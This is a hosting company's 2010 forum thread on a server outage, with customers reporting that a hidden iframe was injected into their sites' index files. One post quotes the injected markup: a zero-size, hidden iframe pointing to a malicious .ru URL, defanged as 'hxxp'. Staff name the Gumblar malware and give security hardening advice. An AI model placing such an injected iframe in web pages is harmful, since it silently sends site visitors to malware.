Jump to content


Photo

Server Down


  • This topic is locked This topic is locked
47 replies to this topic

#1 TCH-Alex

TCH-Alex

    Technical Support

  • Staff
  • PipPipPipPip
  • 664 posts

Posted 13 June 2010 - 11:31 AM

The server is currently down and we are investigating the issue.

We found few file system errors on the primary checking and we are working hard to fix the issues.

Please watch this thread for further updates.

We are sorry for the inconvenience and short notice.

Alex Spaford
Technical Support
TotalChoice Hosting, Inc.
Total Choice Hosting - Helpdesk


#2 rajakiit

rajakiit
  • Members
  • 2 posts

Posted 13 June 2010 - 12:19 PM

Any idea how soon it will be back up?

#3 TCH-Alex

TCH-Alex

    Technical Support

  • Staff
  • PipPipPipPip
  • 664 posts

Posted 13 June 2010 - 12:34 PM

On file system checks, it is found that few errors on primary drive, that may leads to a crash.

Now, we working hardly on the next steps to resolve the issue.

Please watch this thread for updates.

Alex Spaford
Technical Support
TotalChoice Hosting, Inc.
Total Choice Hosting - Helpdesk


#4 TCH-Thomas

TCH-Thomas

    Volunteer Moderator

  • Members
  • PipPipPipPip
  • 14,908 posts

Posted 13 June 2010 - 01:39 PM

Welcome to the forum, rajakiit. :)

I don´t think the techs know at this moment how long it will take to solve this but I can assure you that they are working as fast as they can.

Thomas Jikrantz
Forum Moderator
TotalChoice Hosting, Inc.

Any links or suggestions for third party software/sites should be used at your own risk. My opinions and recommendations are not necessary those of TCH and TCH is not responsible.

As a Forum Moderator I can assist in answering many of your hosting related questions. However, I am unable to answer questions about specifics relating to your account such as billing and server related issues. Should you need assistance in these areas, please contact our Help Desk or our many other options. Another good place to find answers is with our help pages, tutorials and movie tutorials.
Web Hosting by Total Choice Web Hosting - 24/7 Help Desk


#5 TCH-Alex

TCH-Alex

    Technical Support

  • Staff
  • PipPipPipPip
  • 664 posts

Posted 13 June 2010 - 01:54 PM

The sad news is that the primary drive has been failed. We placed the new disk and Operating system has been installed.

cPanel is being installed and we shall restore the accounts soon.

Alex Spaford
Technical Support
TotalChoice Hosting, Inc.
Total Choice Hosting - Helpdesk


#6 smartdog

smartdog

    Family Friend

  • Members
  • PipPip
  • 30 posts

Posted 13 June 2010 - 04:46 PM

The sad news is that the primary drive has been failed. We placed the new disk and Operating system has been installed.

cPanel is being installed and we shall restore the accounts soon.


Just writing to get a subsscribe to this thread

Edited by smartdog, 13 June 2010 - 04:48 PM.


#7 mikemueller

mikemueller

    New To The Neighborhood

  • Members
  • Pip
  • 7 posts

Posted 13 June 2010 - 04:54 PM

I had an issue yesterday where I had to remove an iframe AFTER the closing html tag in every index.php file (wordpress blog)
No idea on how it got there and only found out about it because I couldn't load the page in Google Chrome.
It was "letMusic.ru" exactly as it shows in this forum thread http://www.tinyporta...p?topic=32855.0

Could this have anything to do with the issue?

#8 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • PipPipPipPip
  • 1,180 posts

Posted 13 June 2010 - 05:02 PM

Account restore started, currently at 1%.
Carl Noonan
Techical Support Manager
TotalChoice Hosting, Inc.
http://www.totalchoicehosting.com

TCH Help Desk .. || .. TCH Blog

Posted Image

#9 TCH-Bruce

TCH-Bruce

    Volunteer Moderator

  • Members
  • PipPipPipPip
  • 19,960 posts

Posted 13 June 2010 - 05:11 PM

I had an issue yesterday where I had to remove an iframe AFTER the closing html tag in every index.php file (wordpress blog)
No idea on how it got there and only found out about it because I couldn't load the page in Google Chrome.
It was "letMusic.ru" exactly as it shows in this forum thread http://www.tinyporta...p?topic=32855.0

Could this have anything to do with the issue?

No this would have nothing to do with the hard drive failing.

But I would ask what version of WP you are using since this was inserted code. Make sure your WP is current and make sure your passwords are secure.

Bruce Richards
Forum Moderator
TotalChoice Hosting, Inc.
Webhosting by Total Choice Web Hosting - General Support Forum

I am a Forum Moderator. While I can assist in answering most of your hosting related questions, I am unable to answer questions about specifics relating to your account such as billing and server related issues. Should you need assistance in these areas, please contact our Help Desk or our many other options. Another good place to find answers is with our help pages, tutorials and movie tutorials.


#10 mikemueller

mikemueller

    New To The Neighborhood

  • Members
  • Pip
  • 7 posts

Posted 13 June 2010 - 05:25 PM

No this would have nothing to do with the hard drive failing.

But I would ask what version of WP you are using since this was inserted code. Make sure your WP is current and make sure your passwords are secure.


It was 2.92 (or the latest version behind the beta 3) I'll upgrade to 3 when it's out of beta.
All plugins were current as well as the theme.
I was going to change passwords and that's when I found out the site was down.

#11 spadin

spadin

    Family Friend

  • Members
  • PipPip
  • 30 posts

Posted 13 June 2010 - 05:39 PM

It was 2.92 (or the latest version behind the beta 3) I'll upgrade to 3 when it's out of beta.
All plugins were current as well as the theme.
I was going to change passwords and that's when I found out the site was down.


I know this is off-topic, but I noticed the same iframe on a Wordpress install on the Jango server yesterday too. I have another Wordpress install on a different TCH server that didn't get this iframe injection.

Thanks for the hard work guys! I hope you're able to resolve the hard drive failure.
Sandro

Edited by spadin, 13 June 2010 - 05:39 PM.


#12 mikemueller

mikemueller

    New To The Neighborhood

  • Members
  • Pip
  • 7 posts

Posted 13 June 2010 - 05:41 PM

I know this is off-topic, but I noticed the same iframe on a Wordpress install on the Jango server yesterday too. I have another Wordpress install on a different TCH server that didn't get this iframe injection.

Thanks for the hard work guys! I hope you're able to resolve the hard drive failure.
Sandro


Maybe it's not off topic at all...

#13 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • PipPipPipPip
  • 1,180 posts

Posted 13 June 2010 - 06:08 PM

20% complete
Carl Noonan
Techical Support Manager
TotalChoice Hosting, Inc.
http://www.totalchoicehosting.com

TCH Help Desk .. || .. TCH Blog

Posted Image

#14 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • PipPipPipPip
  • 1,180 posts

Posted 13 June 2010 - 06:54 PM

35%
Carl Noonan
Techical Support Manager
TotalChoice Hosting, Inc.
http://www.totalchoicehosting.com

TCH Help Desk .. || .. TCH Blog

Posted Image

#15 smartdog

smartdog

    Family Friend

  • Members
  • PipPip
  • 30 posts

Posted 13 June 2010 - 07:30 PM

umm, ok..this is weird..there is now an "iframe" in the top of my zencart front page too! Is this a coincidence???
says: <iframe src=hxxp://letsmusic.ru/tds/go.php?sid=3 width=0 height=0 style="display:none"></iframe>

replaced http with hxxp for security reasons

#16 mikemueller

mikemueller

    New To The Neighborhood

  • Members
  • Pip
  • 7 posts

Posted 13 June 2010 - 07:47 PM

umm, ok..this is weird..there is now an "iframe" in the top of my zencart front page too! Is this a coincidence???
says: <iframe src=hxxp://letsmusic.ru/tds/go.php?sid=3 width=0 height=0 style="display:none"></iframe>

replaced http with hxxp for security reasons



curiouser and curiouser...

#17 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • PipPipPipPip
  • 1,180 posts

Posted 13 June 2010 - 07:51 PM

50%
Carl Noonan
Techical Support Manager
TotalChoice Hosting, Inc.
http://www.totalchoicehosting.com

TCH Help Desk .. || .. TCH Blog

Posted Image

#18 smartdog

smartdog

    Family Friend

  • Members
  • PipPip
  • 30 posts

Posted 13 June 2010 - 07:57 PM

Can we address the iframe injection issue on this server? I am concerned and am checking all of my index php pages tonight!

#19 smartdog

smartdog

    Family Friend

  • Members
  • PipPip
  • 30 posts

Posted 13 June 2010 - 08:14 PM

I also want to add to this...

I found 3 other index.php files that the same iframe exploit was inserted, and they were all in my admin section!
Not good! I've fixed the problem, but am still concerned this this is a server wide issue since it isn't just my site.

#20 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • PipPipPipPip
  • 1,180 posts

Posted 13 June 2010 - 08:35 PM

At 65%
Carl Noonan
Techical Support Manager
TotalChoice Hosting, Inc.
http://www.totalchoicehosting.com

TCH Help Desk .. || .. TCH Blog

Posted Image

#21 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • PipPipPipPip
  • 1,180 posts

Posted 13 June 2010 - 08:42 PM

Please note that we are restoring the accounts with the backups that is available on the server. If the backed up data is compromised, then the account will naturally be restored with it. Iframe exploit has nothing to do with a disk getting corrupt. A typical iframe exploit originate from the client account getting infected with trojan which then sends the ftp passwords to attackers. They use the logins to modify the contents of the site.

http://en.wikipedia.org/wiki/Gumblar and searching in google will give you more details about it.

What you need to do at the earliest is to check your local system as well as others who are having the logins with updated spyware / malware / antivirus scanner to ensure that your system is clean. Please note that many users have mentioned Malwarebytes, the free version of Comodo etc picking this up and blocking any "further" installs onto the local system. So I would suggest trying out that as well. Once done, update your machine and install all patches. You can then reset the logins of all your accounts (cpanel, email accounts etc) to a very secure one.

DO NOT save this password on your browser or system system as plain text. You can use password managers like AnyPass or any other that you feel comfortable to encrypt them upon storing. Try not to store them inside programs that you use to upload files to a server.

I would suggest using the secure link for all cpanel accesses --
https://PUT_DOMAIN_HERE/cpanel
https://PUT_SERVERNAME_HERE/cpanel
and using sftp in case you are uploading.
Carl Noonan
Techical Support Manager
TotalChoice Hosting, Inc.
http://www.totalchoicehosting.com

TCH Help Desk .. || .. TCH Blog

Posted Image

#22 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • PipPipPipPip
  • 1,180 posts

Posted 13 June 2010 - 08:52 PM

umm, ok..this is weird..there is now an "iframe" in the top of my zencart front page too! Is this a coincidence??


Please check your zen cart version as I believe it needs an update. The latest version is 1.3.9d and yours seem to indicate 1.3.7
Carl Noonan
Techical Support Manager
TotalChoice Hosting, Inc.
http://www.totalchoicehosting.com

TCH Help Desk .. || .. TCH Blog

Posted Image

#23 smartdog

smartdog

    Family Friend

  • Members
  • PipPip
  • 30 posts

Posted 13 June 2010 - 08:58 PM

Carl: It is a fully patched updated version as far as security is concerned tho...
I am in the midst of downloading a recent version, but my main page outside of zencart seems to have been affected too :(

#24 scotlandview

scotlandview

    Family Friend

  • Members
  • PipPip
  • 27 posts

Posted 13 June 2010 - 09:02 PM

I am on jango and have the same security issues where everytime the index.php and index.html files are being modified with an iframe. AND all my software is up to date and it ist still happening. I had mentioned that I suspect this is a server issue but TCH says it isnt. I now am even more convinced that the Jango server is compromised since a lot of others who are hosted in this server have similar problems. What is going to happen now?

Thanks
Ron

#25 smartdog

smartdog

    Family Friend

  • Members
  • PipPip
  • 30 posts

Posted 13 June 2010 - 09:09 PM

Digging deeper..ALL of my index.php and index.htm and index.html have same code. :( NOT just the zencart

#26 scotlandview

scotlandview

    Family Friend

  • Members
  • PipPip
  • 27 posts

Posted 13 June 2010 - 09:12 PM

@smartdog, that is what happened to me as well AND all my files had permission changed to 777, you'd better check that too!

#27 rajakiit

rajakiit
  • Members
  • 2 posts

Posted 13 June 2010 - 09:17 PM

A quick curiosity question back on the original thread... when Fantastico De Luxe is restored on the server, is the Drupal update in the queue to be placed in Fantastico? If so, I will wait 'til then to install it... it is SO much easier to upgrade that way than doing it manually.....

#28 scotlandview

scotlandview

    Family Friend

  • Members
  • PipPip
  • 27 posts

Posted 13 June 2010 - 09:28 PM

It was "letMusic.ru" exactly as it shows in this forum thread http://www.tinyporta...hp?topic=32855.


Same here, this is how it started with me as well, about eight to nine days ago to be precise! :(

#29 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • PipPipPipPip
  • 1,180 posts

Posted 13 June 2010 - 09:41 PM

Let me be very clear about this server restore.

We understand your concerns and assure you that the problem with this server is a disk going bad and not a compromise. We have always been open in sharing information. TCH has had a few server compromises in the past and it was always disclosed to the clients. We have a variety of server security software in place and there is no way the server is going to remain hacked for days. As usual all server logs were checked.

Please note that our primary aim is to get the accounts back online at the earliest. The box will be in it full configuration once the restore is complete. We will work on any account level issues once the restore is reported as complete.
Carl Noonan
Techical Support Manager
TotalChoice Hosting, Inc.
http://www.totalchoicehosting.com

TCH Help Desk .. || .. TCH Blog

Posted Image

#30 TCH-Carl

TCH-Carl

    Technical Support

  • Staff
  • PipPipPipPip
  • 1,180 posts

Posted 13 June 2010 - 09:42 PM

Account restore is at 75%
Carl Noonan
Techical Support Manager
TotalChoice Hosting, Inc.
http://www.totalchoicehosting.com

TCH Help Desk .. || .. TCH Blog

Posted Image

#31 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • PipPipPipPip
  • 6,798 posts

Posted 13 June 2010 - 10:28 PM

TCH Gang,

I wanted to give you an update on the status of Jango.

We are nearly 90% thru the account restore.

There are no signs of a server compromise. In fact I was at the Data Center personally and went thru this server with my techs and we were not able to locate any thing that would have pointed to the server being compromised.

It was decided to restore the server when we noted several errors from the main hard drive. This coupled with the possible security issues, it was really a good choice to go forward with t restore. We really had no choice, every time we started to get thru a FSCK on the server more files would start going corrupt.

We have seen servers compromised in the past and we have always been very open and honest about this type of event. In this case, we did not see any signs of a compromise. There were just severe issues with the file system/hard drives.

My team is always working hard to bring you the best service possible. I am sorry for this unscheduled downtime, but we are working to provide you the best possible service.

Thank you

Bill Kish

Head Cook and Bottle Washer

If you need help with your account or have any questions, please feel free to contact me using any of the contact methods below.  I can be reached 24 hours a day seven days per week.

Office :: 800-930-0485 x211
Mobile :: 248-632-3243

email: bill(at)totalchoicehosting.com

Instant Messenger -
AOL Instant Messenger: tchgurubill
Yahoo Messenger : tchgurubill
MSN Messenger : tchgurubill@hotmail.com

Thank you for your support and continued business


#32 scotlandview

scotlandview

    Family Friend

  • Members
  • PipPip
  • 27 posts

Posted 13 June 2010 - 10:34 PM

Thanks Bill for the update.

I am still puzzling with one question... :(

How do you explain that at least three and perhaps even more accounts on this same server have similar security issues? Would you like to comment on that please?

Thanks
Ron

#33 gcjames

gcjames
  • Members
  • 1 posts

Posted 13 June 2010 - 10:51 PM

I had the same thing, in addition to about 100-150 hidden links added to my page. I also noticed that emails sent just before the server went down did not come back. Will those be restored? I really needed a couple of them.

#34 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • PipPipPipPip
  • 6,798 posts

Posted 13 June 2010 - 11:02 PM

Once we get the restore done, we can start looking at the logs in more detail.

Bill Kish

Head Cook and Bottle Washer

If you need help with your account or have any questions, please feel free to contact me using any of the contact methods below.  I can be reached 24 hours a day seven days per week.

Office :: 800-930-0485 x211
Mobile :: 248-632-3243

email: bill(at)totalchoicehosting.com

Instant Messenger -
AOL Instant Messenger: tchgurubill
Yahoo Messenger : tchgurubill
MSN Messenger : tchgurubill@hotmail.com

Thank you for your support and continued business


#35 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • PipPipPipPip
  • 6,798 posts

Posted 13 June 2010 - 11:03 PM

Ron,

It could be that three or four accounts on the server all had the same security issue within the files in their /home account.

I will admit that having so many accounts with the same security issues is odd, and we are looking into this now.

The main thing I want to do is get this server back online fully and secure, then attack the questions.

Bill Kish

Head Cook and Bottle Washer

If you need help with your account or have any questions, please feel free to contact me using any of the contact methods below.  I can be reached 24 hours a day seven days per week.

Office :: 800-930-0485 x211
Mobile :: 248-632-3243

email: bill(at)totalchoicehosting.com

Instant Messenger -
AOL Instant Messenger: tchgurubill
Yahoo Messenger : tchgurubill
MSN Messenger : tchgurubill@hotmail.com

Thank you for your support and continued business


#36 scotlandview

scotlandview

    Family Friend

  • Members
  • PipPip
  • 27 posts

Posted 13 June 2010 - 11:08 PM

Bill, thanks very much!

Let's hope these security issues will soon be history!

Thanks
Ron :(

#37 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • PipPipPipPip
  • 6,798 posts

Posted 13 June 2010 - 11:13 PM

Security issues be gone!!!

The restore is completed, we have a couple failed accounts that did not restore.

The team is working on it now.

Bill Kish

Head Cook and Bottle Washer

If you need help with your account or have any questions, please feel free to contact me using any of the contact methods below.  I can be reached 24 hours a day seven days per week.

Office :: 800-930-0485 x211
Mobile :: 248-632-3243

email: bill(at)totalchoicehosting.com

Instant Messenger -
AOL Instant Messenger: tchgurubill
Yahoo Messenger : tchgurubill
MSN Messenger : tchgurubill@hotmail.com

Thank you for your support and continued business


#38 smartdog

smartdog

    Family Friend

  • Members
  • PipPip
  • 30 posts

Posted 13 June 2010 - 11:44 PM

Bill: When you said "Security Issues Be Gone"
Can you please explain? I've spent all night removing said code from all of my index pages and want to be assured this is not going to happen again, and basically would like to know why it happened if you would be so kind.

Edited by smartdog, 13 June 2010 - 11:46 PM.


#39 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • PipPipPipPip
  • 6,798 posts

Posted 13 June 2010 - 11:49 PM

I was referring to the security issues on a few accounts on this server.

We are still reviewing the old server logs and have been unable to find any signs of a server compromise. Does this mean the server was not compromised? No it really does not. However, we can not find anything that points to a total server compromise.

What I can tell you is that we have a new server online and have restored all our backups to this server. So if there were any server level compromises those are gone.

At this point we will continue to work towards getting everyone's data back online via account restores and work on going thru the old server to find any thing we missed the first time thru.

Bill Kish

Head Cook and Bottle Washer

If you need help with your account or have any questions, please feel free to contact me using any of the contact methods below.  I can be reached 24 hours a day seven days per week.

Office :: 800-930-0485 x211
Mobile :: 248-632-3243

email: bill(at)totalchoicehosting.com

Instant Messenger -
AOL Instant Messenger: tchgurubill
Yahoo Messenger : tchgurubill
MSN Messenger : tchgurubill@hotmail.com

Thank you for your support and continued business


#40 smartdog

smartdog

    Family Friend

  • Members
  • PipPip
  • 30 posts

Posted 13 June 2010 - 11:55 PM

ok, understood.
In the meantime..can you please inform those of us that were affected by this particular exploit what else to look for in our site pages/logs/etc to make sure we are not still comprimised? Any help you can provide would be greatly appreciated. And I would love it if you could make it more in laymans terms as I am not 100 percent up on technical lingo. Thanks.

#41 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • PipPipPipPip
  • 6,798 posts

Posted 14 June 2010 - 12:03 AM

smartdog,

In order to keep your account secure, here are some of steps that you can take:

# Maintain strong passwords for all logins (cpanel, email accounts, database users, ftp etc). You can use a combination of alphabets, numbers and special characters for this. Ensure that it is a long one and is rotated frequently.

# Maintain different passwords for cpanel, email accounts, database users etc. ie, different passwords for each login requirement.

# Ensure that no files / directories have loose permissions set on them. This is very important.

# Update all your scripts to the latest release by the vendor as and when they provide it. You can sign up for their newsletters so that you gets alerts whenever a revised version is available.

# Do not leave any scripts unattended if you are not really using it, always better to remove them from your account.

I would suggest using the secure link for all cpanel accesses --

https://PUT_DOMAIN_HERE/cpanel
https://PUT_SERVERNAME_HERE/cpanel and using sftp in case you are uploading.

Make sure the computers your using to connect to the TCH are secure and free of virus and malware. Make sure your running up to date anti-virus and malware software.

There's an exploit called "Gumbler" that spreads itself to webmaster's web sites from their personal computers. The virus uses your FTP credentials to upload infections to your sites without your interaction, injecting obfuscated javascript into html, js and other files on the server. It spreads itself when browsers visit the pages

Bill Kish

Head Cook and Bottle Washer

If you need help with your account or have any questions, please feel free to contact me using any of the contact methods below.  I can be reached 24 hours a day seven days per week.

Office :: 800-930-0485 x211
Mobile :: 248-632-3243

email: bill(at)totalchoicehosting.com

Instant Messenger -
AOL Instant Messenger: tchgurubill
Yahoo Messenger : tchgurubill
MSN Messenger : tchgurubill@hotmail.com

Thank you for your support and continued business


#42 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • PipPipPipPip
  • 6,798 posts

Posted 14 June 2010 - 12:05 AM

There is a article on cnet about gumblar.

http://news.cnet.com...244529-83.html"

Bill Kish

Head Cook and Bottle Washer

If you need help with your account or have any questions, please feel free to contact me using any of the contact methods below.  I can be reached 24 hours a day seven days per week.

Office :: 800-930-0485 x211
Mobile :: 248-632-3243

email: bill(at)totalchoicehosting.com

Instant Messenger -
AOL Instant Messenger: tchgurubill
Yahoo Messenger : tchgurubill
MSN Messenger : tchgurubill@hotmail.com

Thank you for your support and continued business


#43 scotlandview

scotlandview

    Family Friend

  • Members
  • PipPip
  • 27 posts

Posted 14 June 2010 - 12:17 AM

Hi Bill,

It's a comfort to know that we are running on a new server, at least that rules out any server side issues (I hope). Has the name of this new server changed or are we still running on jango?

Thanks for all the hard work and informative thread!

Ron :(

#44 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • PipPipPipPip
  • 6,798 posts

Posted 14 June 2010 - 12:22 AM

Ron,

Thanks for your continued support and of course your business.

We will be keeping the server name.

Bill Kish

Head Cook and Bottle Washer

If you need help with your account or have any questions, please feel free to contact me using any of the contact methods below.  I can be reached 24 hours a day seven days per week.

Office :: 800-930-0485 x211
Mobile :: 248-632-3243

email: bill(at)totalchoicehosting.com

Instant Messenger -
AOL Instant Messenger: tchgurubill
Yahoo Messenger : tchgurubill
MSN Messenger : tchgurubill@hotmail.com

Thank you for your support and continued business


#45 smartdog

smartdog

    Family Friend

  • Members
  • PipPip
  • 30 posts

Posted 14 June 2010 - 12:22 AM

Everything you've mentions i have in place..other than the zencart not being the latest version *but.it is patched with all security updates.

And, I am running full time Malwarebytes, and use ESET for my firewall and av..so, i am pretty sure it was not myself that caused this. I kinda feel that because it was not just my site affected that it "possibly" could have been an issue with the "backup" that was used? I am not totally convinced my personal settings were the issue here. But...as you said, you are still looking at the logs. I've also looked thru mine and cannot see anything for June that looks like an exploit. This is why i find it very strange.

smartdog,

In order to keep your account secure, here are some of steps that you can take:

# Maintain strong passwords for all logins (cpanel, email accounts, database users, ftp etc). You can use a combination of alphabets, numbers and special characters for this. Ensure that it is a long one and is rotated frequently.

# Maintain different passwords for cpanel, email accounts, database users etc. ie, different passwords for each login requirement.

# Ensure that no files / directories have loose permissions set on them. This is very important.

# Update all your scripts to the latest release by the vendor as and when they provide it. You can sign up for their newsletters so that you gets alerts whenever a revised version is available.

# Do not leave any scripts unattended if you are not really using it, always better to remove them from your account.

I would suggest using the secure link for all cpanel accesses --

https://PUT_DOMAIN_HERE/cpanel
https://PUT_SERVERNAME_HERE/cpanel and using sftp in case you are uploading.

Make sure the computers your using to connect to the TCH are secure and free of virus and malware. Make sure your running up to date anti-virus and malware software.

There's an exploit called "Gumbler" that spreads itself to webmaster's web sites from their personal computers. The virus uses your FTP credentials to upload infections to your sites without your interaction, injecting obfuscated javascript into html, js and other files on the server. It spreads itself when browsers visit the pages



#46 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • PipPipPipPip
  • 6,798 posts

Posted 14 June 2010 - 12:28 AM

Smartdog,

That is actually good that you are very up on your security. We will keep reviewing the old server, but most importantly we are moving forward with the new server.

Thank you for your support.

Bill Kish

Head Cook and Bottle Washer

If you need help with your account or have any questions, please feel free to contact me using any of the contact methods below.  I can be reached 24 hours a day seven days per week.

Office :: 800-930-0485 x211
Mobile :: 248-632-3243

email: bill(at)totalchoicehosting.com

Instant Messenger -
AOL Instant Messenger: tchgurubill
Yahoo Messenger : tchgurubill
MSN Messenger : tchgurubill@hotmail.com

Thank you for your support and continued business


#47 wildenborch

wildenborch
  • Members
  • 3 posts

Posted 14 June 2010 - 03:00 AM

Hi All,

I have a updated smf/tinyportal site and also my index.php files were hacked.
All index files were dated 10-10-2006 and it happened to 644 & 755 attributed files.

Fred
The Netherlands

Edited by wildenborch, 14 June 2010 - 03:07 AM.


#48 Head Guru

Head Guru

    Bill Kish Head Guru

  • Admins
  • PipPipPipPip
  • 6,798 posts

Posted 14 June 2010 - 08:20 AM

The restore of the server has been completed. If your still having any issues, please feel free to open a support ticket and let us know.

Thank you for your support. If we track down any issues that we did not uncover earlier, I will let you know.

Bill Kish

Head Cook and Bottle Washer

If you need help with your account or have any questions, please feel free to contact me using any of the contact methods below.  I can be reached 24 hours a day seven days per week.

Office :: 800-930-0485 x211
Mobile :: 248-632-3243

email: bill(at)totalchoicehosting.com

Instant Messenger -
AOL Instant Messenger: tchgurubill
Yahoo Messenger : tchgurubill
MSN Messenger : tchgurubill@hotmail.com

Thank you for your support and continued business





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users